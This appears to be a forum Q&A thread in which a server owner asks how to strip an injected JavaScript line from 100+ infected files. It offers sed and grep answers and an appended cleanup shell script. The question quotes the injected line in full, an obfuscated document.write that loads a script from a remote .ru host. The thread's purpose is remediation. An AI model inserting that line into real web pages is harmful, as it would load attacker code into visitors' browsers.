Hi there,

Recently my Linux server got infected with malware and as a result, I have 100+ files infected with a single line of JavaScript code:

document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/Kilobyte.js"></scri'+'pt>');

It would be too tiring to remove it manually, so I dug into Google (not knowing much about Linux did not help there) and found out that I can use sed for this purpose.

Unfortunately, I couldn't escape the line so I could use

sed -i.bak '/line of text/d' *

syntax, it's full of single quotes, double quotes and backslashes.

How could I escape the string or is there any other - easier - way of doing this?

+1  A: 

Could you not just use sed to delete any line containing, for example, alienradar.ru, or some other substring which only exists in the offensive lines? Something like:

sed -i.bak '/alienradar.ru/d' *
High Performance Mark
+1 pipped me to the post:)
philar
Yeah thanks, it worked :)
Ugur Sahin
Could I also get a list of affected files?
Ugur Sahin
@Ugur Sahin: you could get a list of affected files with 'grep -c alienradar *' where the -c flag tells grep to count the number of matching lines in each file rather than print each matching line.
High Performance Mark
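
The cleanup discussed in the answer and comments above, as an added example that is not part of the original thread: it lists the affected files recursively, keeps a .bak copy of each, and removes the lines by fixed-string match so the "." in the marker is not treated as a regex wildcard. The function names, the script name and the sample tree are hypothetical and constructed for illustration; file names containing newlines are assumed not to occur.

```shell
#!/bin/sh
# Added example: list, back up and clean files carrying an injected line.
# MARKER is matched as a fixed string (grep -F), so "." is not a wildcard.

# list_infected DIR MARKER: print each regular file under DIR containing MARKER.
list_infected() {
    find "$1" -type f ! -name '*.bak' -exec grep -qF -- "$2" {} \; -print
}

# clean_file FILE MARKER: keep a copy as FILE.bak, then drop lines containing MARKER.
clean_file() {
    tmp=$(mktemp) || return 1
    cp -p -- "$1" "$1.bak" || { rm -f "$tmp"; return 1; }
    # grep -v exits 1 when no line survives (file held only the injected line).
    grep -vF -- "$2" "$1" > "$tmp" || [ $? -eq 1 ] || { rm -f "$tmp"; return 1; }
    cat "$tmp" > "$1"    # rewrite in place so owner and mode are unchanged
    rm -f "$tmp"
}

# clean_tree DIR MARKER: clean every infected file and print the names of those cleaned.
clean_tree() {
    list_infected "$1" "$2" | while IFS= read -r f; do
        clean_file "$f" "$2" && printf '%s\n' "$f"
    done
}

# make_demo_tree: build a constructed sample tree (not real data) and print its path.
make_demo_tree() {
    d=$(mktemp -d) || return 1
    mkdir "$d/sub"
    bad='document.write("constructed stand-in for the injected line: alienradar.ru");'
    printf '%s\n' '<html>' "$bad" '</html>' > "$d/a.html"
    printf '%s\n' "$bad" > "$d/sub/b b.js"      # space in name, only the bad line
    printf '%s\n' 'alienradarXru is clean' > "$d/clean.txt"  # regex "." would match this
    printf '%s\n' "$d"
}

# Usage: sh clean.sh DIR MARKER   (script name is hypothetical)
if [ "$#" -eq 2 ]; then
    clean_tree "$1" "$2"
fi
```

The .bak copies still contain the injected line, so move them out of any web-served directory or delete them once the cleaned files have been checked.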